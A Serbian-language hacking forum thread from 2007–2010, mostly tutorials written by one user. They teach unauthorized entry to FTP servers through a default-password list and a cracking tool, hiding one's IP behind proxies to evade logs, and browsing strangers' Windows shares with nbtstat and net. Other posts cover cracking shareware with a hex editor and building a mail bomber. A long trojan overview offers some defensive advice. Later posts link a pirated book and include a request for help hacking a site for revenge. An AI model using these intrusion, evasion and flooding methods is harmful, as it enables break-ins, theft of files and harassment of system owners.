Nekon sto se konektujemo na FTP server, docekace nas neka vrsta banera za dobrodoslicu koji izgleda ovako:

Connected to web2.mtnl.net.in.
220-
220-#*************************************************************
220-# Welcome to MTNL's ftp site
220-#*************************************************************
220-#
220-# You can upload your own homepages at this site!!!
220-#
220-# Just login with your username and upload the HTML pages.
220-# (You can use your favourite HTML editor as well)
220-#
220-# World will see it at http://web2.mtnl.net.in/~yourusername/
220-#
220-# So get going......UNLEASH YOUR CREATIVITY !!!!
220-#
220-#*************************************************************
220-
220 ftp2.mtnl.net.in FTP server ready.
User (web2.mtnl.net.in:(none)): forbidden
331 Password required for forbidden.
Password:

Kao sto i sami vidite za ulazak na FTP server potreban je password. Sada vi sigurno mislite 'pa koj ce mi to k*rac kada ne znam password?' Stvar je u tome sto veliki broj FTP servera dozvoljava takozvane anonimne ulaze. To znaci da ce te kao password iskoristiti anonymous i moci ce te da upadnete u server i izvrsite upload ili download fajlova. Ali na nasu zalost postoje i serveri koji ne dozvoljavaju anonimne ulaze, vec zahtevaju odredjeni password. Da bi upali u ovakav server ne postoji drugi nacin osim da provalimo password. Predlazem da prethodno kao password isprobate ime samog servera, a ukoliko to nece probajte neki password sa sledece kratke liste:

admin        12345
administrator    abc
pass        qwerty
password
open   
enter

(procitajte tutorial 'Password Krekeri')

Ukoliko nece ni jedan od ovih passworda onda vam preporucujem jedan lamerski, ali efikasan nacain: da nabavite neki program za krekovanje FTP passworda. Na mom sajtu mozete naci odlican program za te svrhe, a zove se Crack FTP. O samom programu ne trebam mnogo da vam pricam jer je veoma jednostavan za koriscenje. Potrebno je samo da unesete adresu FTP servera, kliknete na CRACK i sacekate da vam se pojavi password FTP servera.

Dakle uspeli smo sada da nabavimo password i upascemo u FTP server, ali tu nastaje jedan problem. Svaki upad u FTP server ostavlja log na kome se vidi da je neko usao u server. Tacnije u logu se vidi nasa IP adresa, a ukoliko neko zna nasu IP adresu, vrlo lako ce nas uhvatiti. Najbolji nacin za sakrivanje IP adrese je koriscenje Firewall-a, WinGate-a, Proxy-a. Ukoliko neznate sta je to, evo malog objasnjenje u nekoliko crta. Proxy je zapravo server na koji se mi konektujemo i koji nam daje laznu IP adresu tj. adresu proxy servera tako da ce se, ukoliko upadnemo u FTP server, u logovima pojaviti adresa proxy servera umesto nase. Sve ovo radi na sledecem principu:

Localhost --> Proxy Server --> FTP Server --> Proxy Server --> Localhost

Posto ja predpostavljam da vi nikad niste koristili neki od proxy servera, morace te da iskoristite program koji se naziva Proxy Redirect i koji se takodje nalazi na mom sajtu. Sam program je veoma jednostavan i dolazi sa velikom listom proxy servera. Takodje i vi sami mozete pronaci proxy servere ako u Google-u ili Yahoo-u ukucate 'proxy server'. Uz pomoc ovog programa bicete potpuno zasticeni i ne postoje nikakve sanse da budete uhvaceni. Detaljno objasnjenje o ovom programu nalazi se u njegovom Readme.Txt fajlu.

Sada smo totalno spremni za upad u FTP server. Dakle, pokrenuli smo proxy server, konektovali se na FTP server i sta sada? E sada je veoma jednostavno! Recimo da zelimo da dodjemo do odredjenog fajla koji se naziva SIFRE.DOC i koji se nalazi u direktorijumu PASS. Da bi ovo uradili pratite sledeci postupak:

ftp> cd pass
Ovom komandom uci ce mo u direktorijum (folder) pod imenom pass. Posto se sada nalazimo u folderu u kome se nalazi zeljeni fajl koji zelimo da download-ujemo, potrebno je izvesti sledeci korak:

ftp> get SIFRE.DOC
Ovime smo otpoceli download naseg zeljenog fajla.

Ukoliko zelimo da vidimo spisak svih fajlova i direktorijuma na serveru unesite samo komandu DIR i spisak ce vam se pojaviti. Nakon sto smo download-ovali zeljeni fajl sa servera ukucacemo DISCONNECT kako bi se diskonektovali tj. kako bi napustili FTP server.

Takodje bih trebalo da spomenem i komandu SYST koja je veoma interesantna. Naime, ona sluzi za prikaz informacija o sistemu FTP servera tj. informacija o operativnom sistemu i verziji FTP-a. A ukoliko to znamo mozemo pronaci odredjeni propust (rupu) u sistemu, ali o tome cemo nekom drugom prilikom...
 A sada nemojte bas da pravite veliku stetu, jer ipak... nije nam to cilj ;)


: Odg: Hacking
: Milenko 29 September, 2007, 03:11:44 PM
FILE SHARING

Ukoliko neznate da li je vama ukljucena Fajl Sharing opcija samo idite na Control Panel / Network. Sada trebate da vidite prozor na kome se nalazi spisak svog mreznog software-a koji ste instalirali, kao sto je TCP/IP i dugme File and Print Sharing. Proverite da li je opcija cekirana. Ukoliko jeste (file sharing je ukljucen) onda je uncekirajte tj iskljucite.

[Krecemo sa upadom]
Sada cu vam objasniti nacin na koji mozete da upadnete na kompjuter gde je ukljucen Fajl Sharing. Cinjenica za to da Windows nije bezbedan je to sto alati za hakovanje se nalaze u samom Windowsu. Programi koji su vam potrebni za ovo su Nbtstat.exe i Net.exe. Oba programa se mogu naci u folderu C:\Windows, ali ukoliko ih tamo ne nadjete, onda ih potrazite na instalacionom CD-u Windowsa. Ovi programi se pokrecu iz MS-DOS Prompta. Da bi ste videli pomocni meni (help) za Nbtstat.exe samo ukucajte nbtstat /? i za Net.exe ukucajte net /?. Sada krenimo u akciju. Prvo vam je potrebna IP adresa ili host kompjutera u koji upadate. Recimo da upadate u komjuter ciji je host computer.isp.com i IP adresa 123.45.67.8. Prvo sto trebate da uradite jeste to da proverite da li je FileSharing na tom kompjuteru ukljucen. To izvedite tako sto ce te ukucati:

nbtstat -a IMEHOSTA
- ili
nbtstat -A IPADRESA

Bitno je da na drugom nacinu ukucate veliko A. Malo je to cudno zato sto DOS nije CASE SENSITIVE, ali tako to radi. Sada mozete da dobijete dve vrste odgovora. Jedan koji ce reci "Host Not Found" i koji nam govori da na kompjuteru nije ukljucen FileSharing (ili da ste pogresili IP adresu) i drugi koji ce vam dati spisak imena (names) type i status koji znaci da ste na pola puta od ulaska u komp. Tabela bi trebala da izgleda ovako:

Name Type Status
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered

Kako sada da upadnete? Lako! Prvo morate da podesite Lmhosts fajl koji se nalazi u C:\Windows\Lmhosts (nema ekstenziju) uz pomoc notepada, a ukoliko ga nema u Windows direktorijumu, onda ga napravite sami (samo ne zboravite da se fajl zove 'Lmhosts' i da NEMA EKSTENZIJU). Da bi ste ga napravili samo otvorite Lmhosts fajl u notepadu, unesite zrtvinu IP asresu, pritisnite TAB, i unesite 'Share Name' - ime koje ste nasli uz pomoc nbtstat-a (u tabeli). Sada snimite ovaj fajl i izadjite iz notepada. Sada postoje dva nacina na koji mozete da pristupite kompjuteru: najlaksi, lak i kul nacin!!!

[Najlaksi nacin]
Imate IP adresu? Imate Share name? OK! Idite na START > RUN i samo unesite sledece:
//IPADRESA/SHARENAME/
na primer:
//123.45.67.8/hostbug/
Ovime ce vam se pojaviti prozor slican onome koji dobijete kada kliknete na My Computer ikonu iz koga ce te moci da pretrazujete zrtvin kompjuter.


: Odg: Hacking
: Milenko 29 September, 2007, 03:13:18 PM
Cracking

Sta je krekovanje programa?

Sigurno ste vec 1000 puta culi od nekoga: 'krekovao sam' igricu ili program, ali da li ste se ikada zapitali sta je zapravo krekovanje? Krekovanje progama (eng. cracking) je naime pronalazenje odredjenih propusta (rupa) u programu i izmena tog istog programa. Postoje milioni programa koji vam dozvoljavaju samo 30 dana koriscenja, ili oni koji traze serijski broj. To su takozvani shareware programi i od vas traze da platite autoru za koriscenje tog programa. Da bi se skinula ova zastita sa programa (umesto da platimo autoru) mi koristimo krekere (cracks) programe koji skidaju tu zastitu i koje obicno mozete naci na internetu. Dakle kada neko kaze 'krekovao sam' to je velika greska, jer krekovanje nije pokretanje krek programa downloadovanog sa interneta, vec pronalazenje rupa u programu i njegova izmena.

Krekovanje programa

Programi se mogu krekovati na razlicite nacine. Ja cu vas nauciti kako da krekujete programe uz pomoc njihovog HEX koda. Za ovo ce vam biti potreban neki HEX EDITOR (program slican notepadu koji cita hex kod). Ovakav program mozete naci svuda, a ja vam predlazem da skinete program sa mog sajta: HEXEDIT koji i ja sam koristim. Pokrenite hex editor i otvorite odredjeni program koji zelite da krekujete. U ovom primeru ja cu se osvrnuti na krekovanje mIRC-a. Kada pokrenete editor i otvorite program (u mom primeru mIRC.exe) pojavice vam se ekran koji je pun raznih znakova, brojeva i slova koji nemaju nikakve logike. Ali, ako pregledate ceo fajl i skoncetrisete se na desnu stranu fajla videcete neke stvari koje i imaju neke logike npr:

... itd ...
 & H e l p € & C o n t e n t s  & A b o u t . . . € ‚ & R e g i s t e r . . . Ä È   # Í • A b o u t m I R C  M S S a n s S e r i f  P R ƒ .  &€ & U R L P … ƒ
... itd ...

Ovo vec i ima neke logike! Ovo je zapravo help meni u mIRCu, i kao sto vidite u help meniu se nalaze Contents, About..., Register... i About mIRC dok MS Sans Serif oznacava FONT teksta. Ako uklonite ovaj deo u mIRC-u vise vas mIRC nece imati HELP meni, i naravno ukoliko niste ragistrovali vas mIRC, nece biti ni potrebe. Takodje odavde mozete promeniti i font meni-a (samo ako promenite MS Sans Serif). Po istom sistemu se mogu krekovati i ostali programi. Potrebno je samo da pregledate ceo HEX kod exe fajla i da ga dobro prostudirate i onda ostaje samo na eksperimentisanju. Verovatno ce te morati da ulozite dosta strpljenja i truda dok ne uspete da krekujete odredjeni program, ali nemojte odustajati, jer samo radom i trudom mozete postati pravi haker. Verovatno je da necete uspeti iz prvog pokusaja da krekujete zeljeni program i zato uvek napravite BACKUP *.exe fajla koji krekujete, kako bi ukoliko pogresite mogli da povratite *.exe fajl.





: Odg: Hacking
: i 29 September, 2007, 03:20:17 PM
...Tracert komandu (ili Traceroot na unix sistemima)...

Nije traceroot vec traceroute...  :)


: Odg: Hacking
: Milenko 29 September, 2007, 03:34:44 PM


Sta je mail bombing?

Mail bombardovanje je takoreci cin slanja velikog broja poruka (par hiljada) zrtvi. Te poruke mogu se i zamaskirati tako da izgleda kao da je poruka dospela sa druge adrese (npr. billgates@microsoft.com). Mail bombing moze prouzrokovati prepunjivanje mail box-a i to ce dovesti do toga da zrtva nece moci da prima poruke iz razloga jer mu je mail box presao odredjenu granicu. Mail bombardovanje je veoma primitivna tehnika, pa se gotovo više i ne koristi. Skoro svi provajderi imaju zaštitu od mail bombi (server odmah zaustavi mailove ako primeti da dolaze iste poruke) a i krajnja zaštita je jednostavna - za manje od 5 minuta cete ih obrisati, dok ce zlonamerni korisnik potrošiti sate i sate da bi vam poslao par hiljada poruka. Mail bombardovanje je cin obicnih lamera i haker dostojan sebe nikada ne bih smeo da na ovaj nacin da izvrsi napad na nekoga. Ukoliko ikada budete zrtva programa, namojte nikada da cekate da se downloaduju svih 100000.... e-mailova, vec upotrebite znanje sa Telnetom, da konektovanjem na sam server obrisete sve mailbomb poruke (procitajte Telnet tutorial). Pored svega, ipak sam se odlucio da vam nesto napisem o ovome i da vam dam listu nekih mailbomber programa.

Up yours
KaBoom
Avalanche
Unabomber
eXtreme mail
Homicide
Mailbomber
Xmas2000

Ovo su neki od malog miliona programa koji se mogu naci na netu. Neke od ovih programa mozete naci na nasem websajtu. Inace, mailbombing je veoma jednostavna stvar... zapravo, uz pomoc java script-a mozete i sami napraviti mailbomber. Evo jednog HTML koda, koji je potrebno iskopirati u Notepad i snimiti kao REBOMB.HTML:








ONLOAD="ResetForm()" BODY link="#00FF00">



E-Mail adresa zrtve:


Broj e-mailova za slanje:


Naslov poruke (subject):




Poruka:



value="BOMBARDUJ">
Mail bomb


Kako da znam da je mail lazan?

Ukoliko dobijete neki e-mail sa nekom adresom billgates@microsoft.com ili slicno budite sigurni da vam poruku nije poslao glavom i bradom Bill Gates. Da bi ste videli ko vam je poslao e-mail morate pogledati HEADER poruke. Evo primera:

Return-Path:
Received: from ptt.yu by mojisp.yu(8.9.1/1.1.20.3/26Oct99-0620AM)
    id UAA0000026614; Fri, 7 Apr 2003 20:01:52 +0530 (IST)
Date: Fri, 7 Apr 2003 20:01:52 +0530 (IST)
From:
Message-Id: <200004071431.UAA0000026614@ptt.yu>
X-UIDL: dcbef1ba736c55ddc08d6a93609979a9

Obratite paznju na e-mail > billgates@microsoft.com. Mail je poslate sa microsoft.com servera, ali ako obratite paznju na drugi red header-a videcete > RECIVED: FROM PTT.YU sto ce vam otkriti da je mail lazan zato sto govori da e-mail nikada nije bio ni poslat sa microsoft.com servera, vec sa ptt.yu servera.



: Odg: Hacking
: Milenko 29 September, 2007, 03:37:22 PM
TROJANCI

Potpuno je pogresno trojance zvati virusima, zato sto su oni kompletne aplikacije i ne sire se kao virusi. Takodje, trojanski konji se mogu ukloniti brisanjem njihovog fajla iz odredjenog direktorijuma, za razliku od virusa koji su obicno zakaceni za druge datoteke i ubacuju se u memoriju. Vecina njih nije sama po sebi destruktivna, ali zato omogucuje bilo kome na Internetu da upravlja vasim kompjuterom ili mu salje vase lozinke itd., tako da to kolika ce nam steta biti naneta zavisi samo od onoga ko se domogao nasih podataka. Kod trojanaca treba napraviti razliku izmedju KLIJENTA i SERVERA. Server je sam trojanac, dok je klijent program pomocu koga se njime upravlja.

Najpoznatiji trojanac je svakako Back Orifice (BO), koga je za samo mesec dana preuzelo i koristilo skoro 100000 ljudi na Internetu. On izgleda kao obicna klijent-server aplikacija za rad na udaljenom racunaru sa izuzetkom sto se server, tj. sam trojanac, instalira bez pitanja, kao virus, kada startujete zaracenu aplikaciju i omogucava svakome ko dodje do vaseg IP broja da preuzme potpunu kontrolu nad vasim racunarom dok ste na Internetu. Posle BO-a zavladala je prava pomama za slicnim programima, pa je izasao i veliki broj njegovih naslednika medju kojima su najpoznatiji NetBus, Millenium itd. Medjutim, i domaci provajderi su resili da tome stanu na put. Vecina je zatvorila port 31337 (na koji je BO najcesce konfigurisan), a otvorene su i e-mail adrese preko kojih se moze prijaviti zloupotreba korisnickog naloga (one su najcesce tipa abuse@provajder npr. abuse@eunet.yu, abuse@beotel.net itd.). Neki dobavljaci koriscenje trojanaca sankcionisu izbacivanjem, dok drugi samo upozoravaju zlonamernike.

Mnogi kada cuju rec trojanac pomisle na programe tipa NetBus-a za nedozvoljenu kontrolu racunara preko Interneta. Da to nije uvijek tako evo liste malo "drugacijih":

"Nuke Master" - proizvoljno brise fajlove na disku;
"Cable Accelerator" - predstavlja se kao program za ubrzanje rada modema, a, u stvari, reboot-uje kompjuter svakih deset minuta;
"Happy99" - menja fajl wsock32.dll da bi mogao da zakaci sebe za svaku poruku koju saljete elektronskom postom ili u diskusione grupe.;
"Master's paradise" - jedna od njegovih verzija otvara FTP server na zarazenom racunaru sto svima omogucava slobodan pristup njegovim fajlovima;
"The 1-900 Trojan" - posebno je zanimljiv zato sto tajno poziva neki od telefonskih brojeva koji pocinju na 1-900 u Americi, koji su namerno izabrani da svaki poziv naplacuju najmanje 4 USD u SAD (mozete zamisliti koliko bi to kostalo kod nas);
"Picture" - pretrazuje nas kompjuter u potrazi za PWL fajlovima (onim u kojima se cuvaju korisnicka imena i sifre) i salje ih na e-mail adresu u Kini;
"Satanz backdoor" - kada startujemo njegovu datoteku po imenu WinVM32.exe pojavljuje se prozorcic sa obavjestenjem o navodnoj gresci u mreznoj komunikaciji i trazi da upisete korisnicko ime i sifru koji se, nakon toga, salju na odredjeni e-mail (prozor se inace ne moze zatvoriti pomocu komande CTRL+ALT+DEL);
"HDFill" - puni hard disk raznim fajlovima dok se ne srusi;
"ProMail" - izgleda kao besplatan mail klijent a, u stvari, salje vase sifre napadacu; Pored ovih, postoji jos i desetine i desetine kopija NetBus-a i BO, zatim nekoliko bezopasnih (npr. "Mouse Joke" koji nasumicno pomjera kursor misa po ekranu) i slicnih nabrojanim.

Kako se zastititi od trojanaca?

Kao prvo, najvaznije je koristiti dobar antivirus. Preporucuje se AntiViral Toolkit Pro (skraceno AVP) / 1 / koji se moze preuzeti sa adrese http://www.avp.com (velicine je oko 4.2 MB). Nakon sto ga instaliramo startujemo deo po imenu "AVP monitor", koji ce biti rezidentan i stalno ce nas stititi. Kvalitetni antivirusi (AV) su jos i Norton Antivirus (http://www.symantec.com), F-Prot (potpuno besplatan DOS program, http://www.datafellows.com/gallery/) i dr. Zatim, treba biti oprezan sa datotekama koje preuzimamo sa Interneta i diskusionih grupa (nedavno se desilo da je na jednoj od konferencija sa yu. prefiksom ostavljena datoteka zarazena trojancem "Kuang", jednim od mnogih 'password stealer'-a namijenjenih za kradju Internet sifara) i svaku pre startovanja skenirati nekim od pomenutih AV programa. Dobro bi bilo imati i neki cisto anti-trojan program (kao na primer "The Cleaner" koji u svojoj bazi ima oko 120 trojanaca, a moze se preuzeti sa http://www.dynamsol.com/moosoft/) ali on i nije toliko neophodan, ukoliko smo postupili po prethodnim pravilima. Takodje, nemojmo nikada preuzimati trojanske konje da bi sa njima eksperimentisali, jer su skoro svi oni zarazeni sopstvenim serverom.

Kako kontrolisati trojana koga imate na sistemu?

Kako kontrolisati trojanca kojeg imate na sistemu? Kako na jednostavan nacin ukloniti trojanca koji se samo startuje iz Registry baze? Ne dozvolite da Vas drugi iskoriscavaju.

Koristite program TFAK - jednostavno. Ovaj program je prvenstveno napisan da bi pomogao uklanjanje i/li kontrolu trojanaca. Kada se program prvi put startuje, on zapamti stanja u AUTOEXEC.BAT, CONFIG.SYS, WIN.INI, SYSTEM.INI, STARTUP direktorijumu, WINSTART.BAT, WININIT.INI i Registry bazi. Kada se nesto promeni u ovim fajlovima, prilikom sledeceg startovanja programa, bice prijavljeno da je doslo do promene u tom sistemskom fajlu. Registry bazu je sada daleko lakse pregledati, jer Vas program direktno uputi u sekciju koja je vezana za taj sistemski fajl pa ne morate da kopate po racunaru gde se sta nalazi. Npr. vise nije potrebno "kopati" po Registry bazi da bi dosli do kljuca:
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run\.
Sada je dovoljno pozvati iz padajuceg menija Registry 1 i imacete kao na dlanu prikaz Registry kljuca
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run\
i
HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ RunServices
ili Registry 2 i bice Vam prikazani sledeci kljucevi:
HKEY_CLASSES_ROOT \ exefile \ shell \ open \ command
i
HKEY_CLASSES_ROOT \ comfile \ shell \ open \ command.
To su svi kljucevi za koje se kace svi standardni trojanci. Odatle sada mozete lako i da uklonite neki red iz Registry baze.  Ovaj program je trojan remover. Trenutno u svojoj bazi ima podatke o 481 trojancu (backdoor i PSW) i 25 klijentskih backdoor funkcija, koje uspesno otkriva i uklanja ili Vam dozvoljava da ih kontrolisete. TFAK moze i da posluzi kao Domain Scanner i Trojan Scanner, tj. da skenira sve portove na Internetu i da trazi sve trojance koji salju neke podatke na Internet. Tu mozete da vidite koji trojanci su jos uvek u "opticaju". Potrebno je samo da u programu navedete raspon IP adresa koje zelite da skenirate ili tacno odredenu IP adresu koju zelite da skenirate.

Detect and remove trojans je skener koji detektuje da li na svom racunaru imate nekog trojanca. Za sada baza moze da detektuje 506 trojanaca. Nije ni puno, a nije ni malo. Port check je opcija kojom mozete da skenirate sve portove koje koristi Vas racunar u potrazi za trojancem. Veoma lako mozete da otkrijete trojanca i da vidite koji on port koristi. Uz pomoc ovog programa mozete uvek da vidite koji su programi trenutno ucitani i da, ako je potrebno, neki "ubijete", tj. da ga obrisete iz memorije. To je omoguceno opcijom What is running ?.

What is autostarted je alatka koja omogucava laksi pregled sistemskih fajlova i mozete jako lako da vidite neku neispravnost koju je uneo neki trojanac. S ovom alatkom treba biti pazljiv jer nestrucnim rukovanjem mozete cak i da onesposobite svoj sistem a onda niste nista uradili. Kako kontrolisati trojanca kojeg imate na Vasem racunaru? Ovaj program, nudi opciju da mozete da kontrolisete neke trojance i da eventualno Vi kontrolisete mediatora. TFAK nudi opciju da kontrolisete sledece trojance: Backdoor 2.03, Blada Runner 0.8, Coma 1.09, Devil, Doly Trojan 1.7, Exploiter, Frenzy 2000, GateCrasher, Host Control, InCommand 1.0, INI Killer, Kaos, NetBus 1.7, OOLT, Phase Zero 1.0, Robo Hack 1.2, Satan's Back Door, Secret Service, Spying King, Sub7 2.0, SysMon, TerrorTrojan, UMuerte, Vampire 1.2, WarTrojan 2 i WinCrash 2.0. Ovu opcija je za malo naprednije korisnike. Autor programa je SnakeByte, koji je clan nemacke Kryptocrew ekipe koja se bavi sigurnoscu korisnika. Ovaj program je besplatan za ne komercijalno koriscenje. Svaka njegova zloupotreba je kaznjiva.



: The Database Hacker`s Handbook
: Alzex 02 October, 2007, 11:56:56 PM
    
The Database Hacker's Handbook


(http://i23.tinypic.com/5ltegg.jpg)

http://rapidshare.com/files/58385155/The_Database_Hacker_s_Handbook.chm


: Odg: Hacking
: flip 11 October, 2007, 07:45:42 PM
a ja mislio da vi nesto znate,cast izuzetcima(i)


: Odg: Hacking
: M4K1 20 July, 2009, 12:45:43 PM
hakeri su jadnici koji sede sami u svoju zamraèenu sobu pišuæi razne skripte iz dana u dan da bi napravili razne viruse kako bi napakostili drugima!!! (http://www.cosgan.de/images/smilie/boese/a050.gif)


: Odg: Hacking
: M4K1 22 July, 2009, 08:26:56 PM
èujem u busu dvoica prièaju da su èitali negde na stranim forumima sprema se veliko hakovanje na Facebook, MySpace i sliène sajtove da obore ceo sistem, tako da svi na celom svetu ima da izgube slike i tu šta još imaju... razlog neznam :(

koliko znam hakuje se programom Worm, sreæom nema ga za download, nekad je bio pre 9 godina pa je provaljen, a i bili su puni virusa tako da bi više neko naneo štetu sebi nego drugome. Worm sada svako sam programira, ima upustva kako se kereira, ali bez znanja u programskom jeziku C++ ta upustva nikom ne bi znaèila.


: Odg: Hacking
: Gabriel 22 July, 2009, 10:20:36 PM
hmmm, hakeri su nazalost jedini pravi inovatori u svetu IT tehnologija i kako virusi u pealnom svetu cine selekciju organizamal tako i u wirtuelnom svetu...
ili to opet Billy Kapijash reklamira novi OS...


: Odg: Hacking
: skokospa 14 December, 2009, 01:08:12 PM
hmmm, hakeri su nazalost jedini pravi inovatori u svetu IT tehnologija

tu si potpuno u pravu...


: Odg: Hacking
: Milenko 18 October, 2010, 09:05:41 PM
Pozz drugari  :yoohoo:

Diste, sta ima, sta se radi  :smiley: ?

Sale, Vlado, treba mi na PM detaljno upustvo kako hakovati stranicu radjenu u frontpage-u, znam da znate  :cheesy:
U iscekivanju vaseg odgovora, pozdrav  :ojha:


: Odg: Hacking
: Pro 20 October, 2010, 10:32:11 PM
hehe ti doðeš èim treba nešto da se hackuje : DDD


: Odg: Hacking
: Gabriel 21 October, 2010, 03:06:53 AM
samo stetu da pravi...


: Odg: Hacking
: Milenko 26 October, 2010, 04:24:52 PM
S obziram da sam ja stetu pretrpeo, vreme je da se vrati istom merom :D


: Odg: Hacking
: Gabriel 03 November, 2010, 01:31:27 PM
pa jesi li nesto uradio, daj da vidimo :)


: Odg: Hacking
: Milenko 03 November, 2010, 06:40:32 PM
Nisam, prosla me zelja :lol:


: Odg: Hacking
: skokospa 08 December, 2010, 02:07:09 PM
tako nekako.... :grin: :LOLman: